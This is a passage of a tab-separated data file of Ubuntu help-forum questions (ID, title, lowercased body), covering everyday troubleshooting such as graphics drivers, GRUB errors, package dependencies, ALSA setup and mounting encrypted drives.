irq 11 memory at d2000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at d000 [ disabled ] [ size=128 ] expansion rom at d3000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel modules : nouveau , nvidiafb 02:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) ( prog-if 30 [ xhci ] ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , fast devsel , latency 0 , irq 16 memory at d6000000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : xhci_hcd kernel modules : xhci-hcd 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , fast devsel , latency 0 , irq 46 i/o ports at b000 [ size=256 ] memory at d4c04000 ( 64-bit , prefetchable ) [ size=4k ] memory at d4c00000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169 04:00.0 network controller : intel corporation centrino wireless-n 1000 subsystem : intel corporation centrino wireless-n 1000 bgn flags : bus master , fast devsel , latency 0 , irq 48 memory at d3800000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlagn kernel modules : iwlagn ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 and my aplay -l : **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc892 analog [ alc892 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc892 digital [ alc892 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 if anyone knows a fix or can help walk me along to find the problem , please please respond !
106021	upgraded mythbuntu from 10.04 to 11.10 - now no gui display	updated this weekend from 10.04 to 11.10 and now when i boot , i get the standard `` mythbuntu '' boot screen then sections of text , then blank screen , then text , then blank scree , etc until i finally just get a black screen . i am running an ati video card hdmi out to tv . i have tried other tv 's , vga monitors , etc , all yield the same result . how do i at least stop the boot process from loading the gui and dumping me into cli so i can start to fix this thing ? thanks .
106028	is it possible to run 64-bit mongo db on my 32-bit pae enabled ubuntu ?	if answer is negative then which workaround would be less painful ? reinstall the system ? run mongo in virtual machine with 64bit ubuntu ? for now i need mongo only for dev purposes , but my test database consists of 3kk entities so i 'm afraid virtual machine will be inefficient .
106030	mp3 's not playing in banshee	just installed ubuntu 11.10 yesterday ( feb19 ) and i have noticed that banshee will not play mp3 's at all . the ubuntu restricted file will not install either ... ..something about not being in my software sources . a few people have recommended this file to me , however , it 's not available to install . seems to me that it should n't be this difficult to get mp3 's working in this age !
106031	how can i remove new kernel versions after downgrading ?	i have some problem . first i upgraded ubuntu to 12.04 and all of packages . but after that i have a lot of problems so i decided to downgrade to 11.10 . after i did that i have two kernels 3.2.x and 3.0.x . i found a lot of solutions how to remove older kernels but i have no idea how to remove newer kernel ? i dont see 3.2 kernel when im using a 3.0 kernel . but i see it in grub . when i type uname -r in terminal i see only 3.0.x kernel which im using at the moment.. any solutions to delete 3.2 kernel ?
106032	dual booting with custom kernels	so i am trying to dual boot mint and arch linux , so i installed mint and then i installed arch skipping the boot loader . then i compiled a kernel in mint and ran update-grup . everything went well up until this point , when in arch i tried to run make install it complained that it could n't find lilo . so i 'm not sure how to get this to work . should i create a common /boot parition ?
106033	way to disable windows from resizing while dragging but allow keyboard shortcut resizing ?	i 'd like to be able to tap a keyboard shortcut and have a window `` snap '' to the left side of the screen . however i hate it when i 'm trying to move windows around and the window keeps trying to resize from my drag actions . so i 'd like to enable a keyboard shortcut to perform this function but disable this function from occurring while dragging windows . is there a way i can safely disable the drag-to-resize action ? ( i hear ccsm is dangerous to use so i prefer not to use it . if ccsm is the only way , will precise have a setting for this in the system settings ? ) is there a keyboard shortcut ( or can i create one ) that will `` snap '' the window to the left side of the screen ? like on windows i can tap shift+super+left to snap a window to the left side of the screen .
106034	scripting question ( youtube-dl and xclip )	i have youtube-dl and xclip installed . is there a way i could write a script that can run commands from both ? for example : youtube-dl -l -- extract-audio ( url ) but instead of pasting a url could i have xclip paste what 's in my clipboard with the command : xclip -o i am a complete noob when it comes to scripting and not even sure what i should use to write the script , as far as i can tell i should use bash .
106036	intel graphics and compiz	i 'm having trouble with compiz . first , i was using the vesa drivers , so compiz failed to start . i switched to intel by removing the vesa packages , installing libgl1-mesa-dri and libgl1-mesa-dlx along with xserver-xorg-vide-intel , and now compiz starts but is incredibly glitchy . switching workspaces makes everything blink uncontrollably , for example . i do n't know what to try next . some diagnostic info : inxi -gx graphics : card : intel core processor integrated graphics controller bus-id : 00:02.0 x.org 1.10.4 drivers intel , fbdev resolution 1366x768 @ 76.0hz glx renderer gallium 0.4 on llvmpipe ( llvm 0x209 ) glx version 2.1 mesa 8.1-devel ( git-6e738d3 oneiric-oibaf-ppa ) direct rendering yes the compiz-check script i found scattered all over the web reports : ./compiz-check gathering information about your system ... distribution : linux mint desktop environment : gnome graphics chip : intel corporation core processor integrated graphics controller ( rev 02 ) driver in use : fbdev rendering method : aiglx checking if it 's possible to run compiz on your system ... checking for texture_from_pixmap ... [ ok ] checking for non power of two support ... [ ok ] checking for composite extension ... [ ok ] checking for fbconfig ... [ ok ] checking for hardware/setup problems ... [ ok ] to be fair , i did get a warning about me having a weird graphics card , and possible poor compiz reliability . can i fix this ?
106039	so , what is the advantage of using the terminal ?	i just installed ubuntu a couple of days ago . as far as i can tell the terminal is a huge part of any linux distro . my question at this point is why ? when i look up anything about it , the commands put in the terminal are all easily done through the gui . so , what are the advantages of using the terminal ? edit : thanks for the answers everyone . after a little poking around and with the help of your answers i can now understand its use . i can proudly say that for the past 3 days i 've been using for just about everything , and i hope to soon have a better grasp on scripting .
106042	how do i stop google chrome ( which is not installed ) from launching ?	i do not want to use google chrome - i purposely installed chromium . but whenever i click on a link in an external application ( like a link in a pdf or email ) google chrome launches . it is not in installed applications in software center
106044	how do i downgrade gracefully from gnome3	i installed the latest gnome3 from webupd8 's ppas and somehow borked my system . while doing a ppa-purge it somehow decided to remove the ubuntu-desktop meta package now while i 'm trying to get back to pure ubuntu , i try this : sudo apt-get install ubuntu-desktop and get this : ubuntu-desktop : depends : eog but it is not going to be installed depends : gnome-control-center but it is not going to be installed depends : gnome-session but it is not going to be installed depends : nautilus but it is not going to be installed depends : nautilus-sendto but it is not going to be installed depends : unity but it is not going to be installed recommends : gnome-screensaver but it is not going to be installed recommends : libgail-3-common but it is not going to be installed recommends : nautilus-share but it is not going to be installed recommends : totem but it is not going to be installed recommends : totem-mozilla but it is not going to be installed recommends : ubuntuone-client-gnome but it is not going to be installed e : unable to correct problems , you have held broken packages . trying to install any of these results in more held dependencies that will not install . how do i `` unhold the broken packages '' to get back to where nautilus can be installed ?
106052	how can a qt application be notified that the user 's session is ending and provide it with opportunity to save its state before being terminated ?	i am writing a qt application and have run into the following problem : when the user logs out or attempts to shut down the machine , the application is instantly terminated without providing it any chance to save any data . i assume the app needs to listen for some event . i tried listening for the sigterm signal , but my application was still terminated before it had a chance to respond to the signal . what options do i have ?
106054	could this be a zero length error ?	the light went out yesterday and my fragile root partition and home partitions failed . i tried recovering the partition with `` fsck '' in a slax live usb , but i got an error : `` could this be a zero length partition '' ( i`m sorry i 'm not near my computer and ca n't give you the exact error , but it was just a single line ) . i booted to slax because the ubuntu live usb wo n't boot if there is a corrupted ext4 partition . is there any way to fix the zero length partition , either by managing to boot into ubuntu live usb somehow or some other tool . thanks alot !
106055	ubuntu stuck in low resolution after uninstalling / disabling nvidia drivers	tried the nvidia driver , installed using the additional drivers panel . did n't like it much ; the cpu seemed to overheat more and the brightness controls stopped working . also selecting a second display is a pain using that horrible nvidia settings thing . so wanted to disabled it again.. problem is , ubuntu is then stuck in either 640x480 or 800x600 ( second time i tried to install it back and then remove again ) . how can i get this back the way it was ? the original ubuntu drivers worked just fine , allowing me to run unity and games properly . i tried a xserver-xorg reconfigure but this did n't do anything . ( no xorg.conf file either ) . this is on a lenovo thinkpad t410i
106056	can not ping between computers , but i can connect ( only one way though )	i am new using linux , so i would really appreciate a simple as possible answer . i can not ping between two computers , neither to nor from . i can ssh from one computer to another , but not the other way around . i would be very grateful if i can get some direction as to what i might have to do in order to fix this . the computer to which i can not connect is ubuntu 10.4 with wireless internet ( but i can connect to other from it ) , while the other one is a mac os . thanks a lot in advance .
106061	how to set iphone tethering interface as default gateway	i am able to do the iphone usb tethering under ubuntu ( 11.10 ) which will be recognized as eth1 interface ( i also have an eth0 internet connection ) . what i want to do is , when the eth1 is up , i want to make it as the default gateway , and if eth1 is down , then return back to using eth0 as default gateway . how can i make it happen ?
106063	when i plug in headphones , my speakers mute , but nothing comes from the headphones	when i plug in headphones , my speakers mute , but nothing comes from the headphones . also , there is a weird red light coming from my headphone jack . i am on a macbook from late 2007 , and have ubuntu 11.10 . thanks !
106065	not able to update	i am new to ubuntu and am having troubles updating . here is the error i 'm receiving : w : gpg error : http : //ppa.launchpad.net maverick release : the following signatures could n't be verified because the public key is not available : no_pubkey 5a9bf3bb4e5e17b5 w : failed to fetch http : //ppa.launchpad.net/ailurus/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch ... can someone please help me figure out what my problem is and how i might correct it ? please note : this involves two different ppa 's within the error results stated .
106066	script not working through cron - jdk version mismatch between shell and script	i am executing a script through cron using the below command : */10 * * * * cd /nas/app/somefolder/psox ; ./runpsox.sh > > /tmp/trial.log 2 > & 1 this is being executed by root user . all path and java_home have been set at the root level and exported . jdk 1.6 is being used . the script also has the path set inside it at the beginning ( have tried both absolute and relative path ) , the java_home and classpath too . i have added the `` env '' and `` java -version '' into the script before the logic . the script fails to work through cron but works when triggered manually . the reason is that the jdk version at shell level is jdk 1.6 but when the script is executed through cron , it is picking up the jdk version as 1.4 and throws a java error . i have checked the associated property files and there is no reference of jdk 1.4 anywhere . please advise , where else i need to check for the jdk version and make it consistent as jdk 1.6 for both shell and the script when running through cron .
106069	changing default install directory for software center	i want to change the default install path of the ubuntu software center . i looked at this article : how do i change software center 's default installation path ? but a ) it is for an older version of ubuntu and b ) it is n't clear - in the 3rd answer mainly - if moving the home dir will change the install path of new packages . initially , when i installed ubuntu i was still using windows , so i made the partition relatively small ( 40gb ) expecting to install some apps , but use my third storage partition ( 400gb ) to keep all my files . now , i am planning on dumping windows , but do n't want to do a clean install of ubuntu necessarily . furthermore , if i do a clean install , with the home dir backed up , will all my applications be backed up also ? thank you in advance .
106078	advice on linux distros for a charity	i 'm doing a non profit job for my work where we are setting up internet for the children ward at the local hospital . we want a client server architecture , we have a server pc and about 7 other medium spec pc's what we are after is a completely locked down linux distro ( preferably a ubuntu based one ) which we can grant access only to firefox , a few games , some paint programs , skype and nothing else . can anyone advise on something suitable ? we are currently trying edubuntu 11.10 but are having a few issues as we are new to linux and especially new to unity .
106083	installing a 10.10 package on a 10.04 lts	while trying to install rubygems 1.3.7 from the maverick repository ( lucis has 1.3.5 ) i am getting the following error : error : breaks existing package 'rubygems ' dependency rubygems1.8 ( = 1.3.5-1ubuntu2 ) is there a way to override this , even though it may not be recommended .
106084	how to use svn list svn+ssh : //user @ host/home/svn/myrepo without svn_ssh path .	first , export the svn_ssh env variable : $ export svn_ssh= '' ssh -l user -i /home/user/.ssh/id_rsa '' second , execute the command below and co is successful : svn co svn+ssh : //user @ host/home/svn/myrepo now the question : is it possible to execute the svn co svn+ssh : // in a single command ? i want to execute the same command in a windows pc environment .
106100	archive manager	the archive manager does not archive files and gives an error message during the archive . archive : /home/roland/downloads/installwow.exe [ /home/roland/downloads/installwow.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/roland/downloads/installwow.exe or /home/roland/downloads/installwow.exe.zip , and can not find /home/roland/downloads/installwow.exe.zip , period . how can i archive games ?
106102	grub fatal installation of ubuntu 11.10 - dual boot for win7	i have win7 installed in my system and i decided to give ubuntu a try . i formatted my drive as follow : c : \ - for win7 - 55g d : \ - data - 40g e : \ - unallocated space - 55g - > this is where the installation of ubuntu i tried to install with this partition table ( all set as logical ) /dev/sda6 /boot - 258 mb /dev/sda7 swap - 2000mb /dev/sda8 / /dev/sda9 /home i get this error in the middle of the installation unable to install grub in /dev/sda6 executing 'grub-install/dev/sda6 ' failed this is fatal error i followed this article http : //www.linuxbsdos.com/2011/05/22/how-to-dual-boot-windows-7-and-ubuntu-11-04/ but it seems not working for ubuntu 11.10 . am i missing something in the installation ? any feedback will be helpful .
106104	archive manager does not archive files	the archive manager does not archive files or games and gives the following error : archive : /media/ba/setup.exe [ /media/ba/setup.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /media/ba/setup.exe or /media/ba/setup.exe.zip , and can not find /media/ba/setup.exe.zip , period . or if i open it using autorun prompt then gives an error : permission denied how can i archive games or other applications in ubuntu ?
106107	could n't execute command : gnome-screensaver-command -- lock verify that this is a valid command	i 'm using ubuntu 11.10 and a very novice user . from today , i 'm suddenly experiencing this problem . if i press ctrl+alt+l to lock the pc , i find the following error message could n't execute command : gnome-screensaver-command -- lock verify that this is a valid command and pc does n't get locked . if i try to lock from menu item `` lock screen '' in the power button at the top right corner of the screen , nothing happens . yesterday i updated and upgraded the os . i think this is the first time i 'm trying to lock the pc after update . what 's going on ? how to fix this ?
106115	problems mounting an encrypted volume on a different computer	i have a set of external hard drives that i use for backups of my photos and images . they were formatted as ext4 and setup with encryption from a laptop running ubuntu 10.04 - and i 've had no problems with mounting and running rsync on my image folders to backup new files to the disks . i recently acquired a netbook for travel purposes , and am trying to get the drives to also work on this so i can make backups while on holiday . the netbook is running ubuntu 11.04 . when i first plugged in one of the drives , i was asked for the password , which i entered , and the disk activity light started blinking , but no file window opened as i expected . however , i did not get any error messages , either . when i opened a file window , i could see the volume listed as `` backup alpha '' ( the disk 's name ) but when i tried to open it , i received the error : unable to mount `` backup alpha '' /dev/dm-0 is mounted when i try to unmount the drive , by right-clicking and selecting the `` safely remove drive '' option , i get the message : unable to stop 500 gb hard drive one or more block devices are holding /dev/sdb one problem i did have when initially trying to access the drive was that cryptsetup had not yet been installed on the computer , and so the first time i tried to enter a password and access the drive failed . i found a way to disable automount , but now i 'm having problems manually mounting the drive : $ sudo mount /dev/sdb /media/backup -o uid=1000 , gid=1000 , utf8 , dmask=027 , fmask=137 mount : unknown filesystem type 'crypto_luks' i found some help at http : //ubuntuforums.org/showthread.php ? t=868681 and tried : $ mkdir /media/backup $ modprobe dm-crypt $ cryptsetup luksopen /dev/sdb backup $ vgchange -ay $ mount /dev/ ( `` volume group name '' ) /media/backup the problem is that vgchange does n't output any volume groups , and i still ca n't mount /dev/sdb
106116	ive installed both the graphics drivers ; is that bad ?	i could n't get one of my games to run so i installed the 'additional drivers ' graphics card driver for my computer but i already installed the one from ati website . would this cause any trouble/slow down ? if so how can i fix this , i needed the 'additional drivers ' one to make my game run : s so basically.. would this cause any trouble/slow down ? thanks , jamie .
106122	places in ubuntu opening with wrong application	places in ubuntu specifically home , documents , music , pictures and downloads are opening in my browser . eg . if i click documents then it opens on firefox . how to operate ubuntu normally again ? please help .
106124	updating php to the latest version in ubuntu 10.04 server edition	please explain to me why ubuntu 10.04 lts server version do n't release the latest version of php . the php version is still in version 5.3.6-13 while the updated version is already at 5.3.10 . will this harm my server 's security ? i want to update it to 5.3.10 but i do n't know how to compile it properly . i am very confused in compiling php because there are so many configure options and i do n't know where to start or which to choose . are there any tips on how to know what i need for the compile options ? i 'm a server beginner please explain to me in layman 's terms.. thank you so much for your time
106129	can i change the default folder that photos are uploaded to when using the ubuntu one files app for android ?	i like that i can sync my pictures from my android phone to my computer with ubuntu one , but i do n't like that the folder appears in the root of my home directory . is there a way i can get the synced folder to reside in , for example , ~/pictures/htc photos/ instead of ~/htc photos ?
106133	how can i solve , error : unknown filesytem grub rescue >	i was previously using win7 and had two partitions on my hard disk . after learning about ubuntu i decide to remove windows and install ubuntu 11.10 instead . all my important files and documents are stored in my second partition . after successful installation , during restart i get the error : error : unknown filesystem grub rescue > please help me to resolve the problem , and note that i do n't want dual boot my machine .
106140	confirmation dialog when opening multiple files	sometimes while selecting multiple file ( holding shift ) i accidentally double click , very fast but it 's considered as double click nonetheless . is there setting in some nautilus configuration file , where i can set dialogue to pop if i double click on multiple selected files ?
106141	touchpad insensitive	i have just purchased a samsung rf511 and as always i installed ubuntu 11.10 on it straight away . everything works out of the box fine except the touchpad . i have to press quite hard on the touch pad for it to move and it 's generally laggy and sloppy . the touch pad is recognized as it should be `` elantech touchpad ''
106144	sending mail without domain name	we have a server , we are using this for backups and other cronjobs . i would like to send mail to the users when one of their cronjobs or backups has ended . is it possible this if i do n't have a domain name ?
106145	how do i subscribe a launchpad.net team to all bugs that have a specific tag in a specific project ?	i would like to subscribe my team to all bugs that have a certain tag in a certain project . this should be possible according to : https : //bugs.launchpad.net/launchpad/+bug/151129 but i ca n't find how to do it .
106148	arora browser in lucid	i tried opening a particular webpage in the arora browser and it crashed - i had a debugger attached but i could n't make much sense of it as there were no debugging symbols installed . with help from the ubuntu irc , i tried installing libqtwebkit4-dbgsym after adding the repository at deb http : //ddebs.ubuntu.com precise main restricted universe multiverse however , when i try to install the package libqtwebkit4-dbgsym i get a message saying : depends : libqtwebkit4 ( =2.2.1-1ubuntu2 ) but it is not installable how could i go about resolving this issue ?
106154	open source command line tools to remove hyperlinks in pdfs ?	are there any open source tools to remove pdf links in ubuntu . i use pdftk and i am not able to find any internal links in it . due to the internal links my python script that uses pypdf to merge the pdf files into one file fails .
106155	blurry screen and fonts after installation	the problem is my screen is not as sharp as i would like , the fonts are greyish and the whole thing is quite literally giving me a headache when i have been looking at it for a while . my machine has an i5 processor and ati radeon 6470 graphics card . i have tried changing resolution but that does not help . the screen looks like the really old crap monitors that my previous employer had . i have checked this out and can see there is a known problem . when i was sorting out ubuntu i pressed the button for the additional driver and on settings/systeminfo/graphics shows vesa seymour . can someone please tell me ( in very easy step by step language ! ) how i can fix this .
106157	gimp interface to change to black	i am using gimp 2.6 on ubuntu 11.10 and wish to chage gimp 's interface to black . how do i do that .
106159	what are point releases in lts versions ?	there are so called `` point releases '' for lts versions of ubuntu . 10.04.3 for instance . what are those `` point releases '' releases ?
106166	kubuntu move encrypted home dir to new ssd ( keep encryption )	i already found how to move my encrypted home dir to new hd , but i have a comprehension question . so when i installed kubuntu 11.10 i choose to have an encryption ( i think there was only possible to choose if the home is encrypted , anyway i choose encryption ) , so my /home has the following structure : /home/.ecryptfs /home/ < my_username > /.ecryptfs ( only link to /home/.ecryptfs/ < my_username > /.ecryptfs ) /home/ < my_username > /.private ( only link to /home/.ecryptfs/ < my_username > /.private ) this should be the solution : how can i move an encrypted home directory to another partition ? i could n't follow up cause probably it was too old . so the point is , my new place should be a new ssd which i added to the system , formatted with ext4 . what i do n't understand is , is this sufficient , in order to keep my encryption , or should i do something to encrypt my new formatted ssd and then do the howto ? thanks a lot ?
106167	how to archive with ignoring files larger than 100mb	i 'm trying to archive files with tar and ignoring files larger than 100mb . is that possible ? ps : not have to use tar .
106172	autocomplete do n't have effect when using environment variable	my os is ubuntu 11.10 . in the terminal when i input cp $ home/ then type tab . it will change to cp \ $ home/ and wo n't give any hint about what 's in this directory . but in vim , it will work just as i want . i heard that vim is using zsh instead of bash .
106174	how do i cut dvb-streams ( mpeg ) easily ? dvbcut does n't run in 11.10	on ubuntu 11.04 natty and older i used to cut streams recorded from me tv with dvbcut . though this package is in official repositories i ca n't use it because of missing the icons on the gui and lacking the option to add it in the context menu for mpeg-files . installing a ( higher ) ppa-version does n't work due to dependencies . when i use avidemux i have struggle with an audio delay . what can i do to have it as easy as before ?
106177	shut down after youtube upload is finished	i upload youtube videos over night using a computer running ubuntu 11.10 as it really eats my bandwidth . but it 's normally done when i 'm not around , so it wastes quite a bit of energy leaving it running . is there any way for me to make it shut down after it 's finished ?
106181	ubuntu 11.10 broken after updates	i have updated my ubuntu 11.10 completely , i had been running it without updating without any issues , had installed quite a lot of packages , installed nvidia drivers , media players , browsers , etc , and everything was just fine . however , after yesterday update the system wont load lightdm anymore . it just loads the purple ubuntu screen and wo n't get past that point . certain services like openssh and networkmanager seem to work just fine , making the computer accessible from the net . computer specs are as follows : processor : amd 6000+ dual core 3.12ghz memory : 4gb ( 2x2gb ddr2 800mhz on dual channel ) hard drive : 320gb ( 150gb allocated to ubuntu , the rest are just files ) version : ubuntu 11.10 ( oneiric ocelot ) 64 bit video card : nvidia geforce 9600gt 512mb ddr3 using latest drivers from nvidia.com ( starting this question as this appears to be a different issue )
106183	how do i create stand alone packages from ubuntu repository	is it possible to create a stand alone deb packages by merging dependancies without manual repacking. ? ? i 've looked at this question but it does n't really answer what i 'm trying to achieve above . if possible how to do it ? update 1 no tools available yet ( ? ) so what about creating new deb package containing all packages which will copy dependencies to the cache and executing main package . is it possible ? update 2 above method appears to be impossible because dpkg cant handle more than one operation at a time . some scripts may can do it update 3 this tool is very helpful but it currently wont support oneric and above still waiting for more generic tool thanks in advance
106186	how to split 7.1 soundcard outputs to 4 stereo outs with alsa	i have a xonar dx ( cmi8788 driver ) 7.1 surround sound card installed on my ubuntu 11.10 system . i want to use the outputs of the card as 4 separate stereo outputs and i am struggling with alsa to get it to work . this is my asound.conf : # /etc/asound.conf pcm_slave.eightchannels { pcm `` hw:0,0 '' # or `` hw:1,0 '' for the second card channels 8 } pcm.stereo1 { type plug slave.pcm { type dshare ipc_key 87882222 slave eightchannels bindings [ 2 3 ] } } pcm.stereo2 { type plug slave.pcm { type dshare ipc_key 87882222 slave eightchannels bindings [ 4 5 ] } } pcm.stereo3 { type plug slave.pcm { type dshare ipc_key 87882222 slave eightchannels bindings [ 6 7 ] } } pcm.stereo4 { type plug slave.pcm { type dshare ipc_key 87882222 slave eightchannels bindings [ 0 1 ] } } this is my aplay -l output : $ aplay -l **** list of playback hardware devices **** card 0 : dx [ xonar dx ] , device 0 : multichannel [ multichannel ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : dx [ xonar dx ] , device 1 : digital [ digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : intel [ hda intel ] , device 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : intel [ hda intel ] , device 1 : alc662 rev1 digital [ alc662 rev1 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 this is my aplay -l output : http : //pastebin.com/myvxfvvr the system seems to completely ignore my configuration . however , i am sure that the config is used , because when i insert a random string at the top , i get a parsing error . any help is greatly appreciated .
106187	lenovo thinkpad l520 slows down when ac power adapter is plugged in	i have a new laptop lenovo thinkpad l520 ( 7859-5bg ) core i5-2520m ( 2.5ghz ) with 4gb ram . having installed ubuntu 11.10 32-bit , while browsing with chrome on gnome classic ( no effects ) , i noticed 173 % cpu usage by chrome browser process , and the system slowly got very very slow , now , at this stage as i removed the power adapter , the system suddenly got faster ( and stopped the lagging behavior ) and cpu usage drops down to 48 % ! ! observation 1 : i was browsing through chrome when my system seemed to be seriously lagging , so i killed chrome to see if it gets any faster . but there remained no difference . notice that cpu usage was a bit strange here . it showed no high activity , but as soon as i would click on applications in gnome panel , it would shoot cpu usage to 70 , or 80 or 90 or 143 % etc . depending on how quickly i clicked back and forth . at this instance i removed by ac adapter of my laptop , and suddenly system got fine . so i again clicked on gnome panel , and noticed that it now took only 7 % or 12 % or 13 % at max , with same kind of clicks in application menu . observation 2 : at the other times , with ac adapter plugged in , top indicates four instances of chromium taking 90 % , 60 % , 47 % and 2 % ( for example ) , and then once i take out the ac adapter same processes take lesser cpu all of a sudden intermediate conclusions : what does this indicate ? i can not figure out any `` other '' process in `` top '' that is suddenly being triggered , its the same process that hogs up my cpu once ac power is plugged in ! note : the problem is now confirmed , as i can repeat that when i have power adapter plugged in ! can anyone tell me what exactly does this indicate ? what is wrong , is it some bug with power management or what ?
106189	touchpad does n't work on ubuntu 11.10 , toshiba salellite l500-1wp	touchpad stopped working about two weeks ago . everything else is working . on windows 7 it 's working . i think , problem is in os . what can i do ? excuse my english , i do n't know it . : - (
106190	how to connect to a virtual server using tightvnc from a windows xp machine ?	our client from a different country provided us a vpn connection which we connect through sonicwall net-extender . i am using windows xp 32-bit . after that i use putty to connect to the client 's ubuntu linux server through ssh who have a static local ip 192.168.x.x and i get connected to the command line interface . then i installed tightvnc server from command line and run it , then i use tightvnc viewer for windows to connect to the ubuntu desktop ( gnome ) and i get connected . the problem : whenever i tried to use any application the tightvnc window gets suddenly closed before the application launches and sometimes it shows the message connection closed . only few applications work like package installer and some of settings , not even the desktop sharing option is working . i want to configure mysql database and web applications in that ubuntu server , it 's ubuntu 11.10 . can somebody guide me regarding this ?
106191	how can i allow a specific standard user in ubuntu 11.10 to mount a specific ntfs file system ?	i want to grant permission one specific standard ubuntu 11.10 user to be able to mount a specific ntfs drive . how can i do that ?
106198	how to install synaptics clickpad patch ?	i 'm affected by this bug , which means my clickpad is not working properly . the bug-description says , there are patches for this , which can be found here . but when i download the newest version of this , i get an archive with directories and files and i have no idea on how to install this .
106201	install ubuntu side by side with windows 7 on existing raid 5 array	i 've got windows alreay installed on raid5 array with 3x1tb hdd . i want to install ubuntu on one partition in this array , but ubuntu setup does n't recognize the array . all that i have found is instruction on how to make `` new '' raid 5 array and setup the ubuntu there , but the problem is that i do not have spare 2tb to copy all the stuff there and make partitions from ubuntu setup . any suggestions are welcome .
106203	why do some packages conflict with themselves ?	after an upgrade to oneiric i have had some troubles with the package manager ( it wanted to remove half of my system , including libc6 , zlib1g packages etc ) . during the fight with aptitude i 've noticed that some packages have meta-information which states that they conflict with themselves . examples : % aptitude show libc-bin package : libc-bin essential : yes new : yes state : installed automatically installed : no version : 2.13-20ubuntu5 priority : required section : libs maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > uncompressed size : 3,420 k conflicts : libc-bin breaks : libc0.1 ( < 2.10 ) , libc0.1 ( < 2.10 ) , libc0.3 ( < 2.10 ) , libc0.3 ( < 2.10 ) , libc6 ( < 2.10 ) , libc6 ( < 2.10 ) , libc6.1 ( < 2.10 ) , libc6.1 ( < 2.10 ) replaces : libc0.1 , libc0.1 , libc0.3 , libc0.3 , libc6 , libc6 , libc6.1 , libc6.1 provides : libc-bin provided by : libc-bin description : embedded gnu c library : binaries see the conflicts : libc-bin line ? one more : % aptitude show qdbus package : qdbus new : yes state : installed automatically installed : no version : 4:4.7.4-0ubuntu8.1 priority : optional section : libs maintainer : kubuntu developers < kubuntu-devel @ lists.ubuntu.com > uncompressed size : 213 k depends : libc6 ( > = 2.3.4 ) , libgcc1 ( > = 1:4.1.1 ) , libqt4-dbus ( = 4:4.7.4-0ubuntu8.1 ) , libqt4-xml ( = 4:4.7.4-0ubuntu8.1 ) , libqtcore4 ( = 4:4.7.4-0ubuntu8.1 ) , libstdc++6 ( > = 4.1.1 ) conflicts : qdbus breaks : libqt4-dbus ( < 4:4.7.3-4ubuntu5 ) , libqt4-dbus ( < 4:4.7.3-4ubuntu5 ) , qt4-dev-tools ( < 4:4.7.3-4ubuntu6 ) , qt4-dev-tools ( < 4:4.7.3-4ubuntu6 ) replaces : libqt4-dbus ( < 4:4.7.3-4ubuntu5 ) , libqt4-dbus ( < 4:4.7.3-4ubuntu5 ) , qt4-dev-tools ( < 4:4.7.3-4ubuntu6 ) , qt4-dev-tools ( < 4:4.7.3-4ubuntu6 ) provides : qdbus provided by : qdbus description : qt 4 dbus tool the same `` conflicts with itself '' feature . i 've resolved my troubles with the package manager now , but the question still bothers me : what does it mean when a package conflicts on itself ? what is this used for ?
106212	i lost my shutdown sound	i lost both my startup and shutdown sounds . i restored the startup sound adding it to startup programs , but i do n't know how to restore my shudown sound . i checked if the sound file is in /usr/share/sounds/ and there it is ... so , any help , please ?
106213	which 11.04 file do i download ?	should be an easy enough question for you ubuntu gurus out there . i need to know which ubuntu file to download for a 64 bit disk image on this webpage . thank you for your time and help .
106220	how to share ubuntu ( make server ( ruby on rails ) ) in home , on virtual machine ?	how can i share my ubuntu server ( ) which is installed on virtual machine . main machine is asus k52de , which os is windows 7 professional . how can i do , that i can attach to my ubuntu from another computer anywhere ? i have non-static ip , and i want to use no-ip free technology . help me please to do this . at first i want to install file server , then ruby on rails ( for our university people small group ) .also internet for mu asus goes via wi-fi router . in virtual is bridge method ip of ubuntu on virtual : 192.168.1.4 of note 192.168.1.3 of pc ( is in same local ) 192.168.1.2 my question is how to access this ubuntu on virtualbox from web !
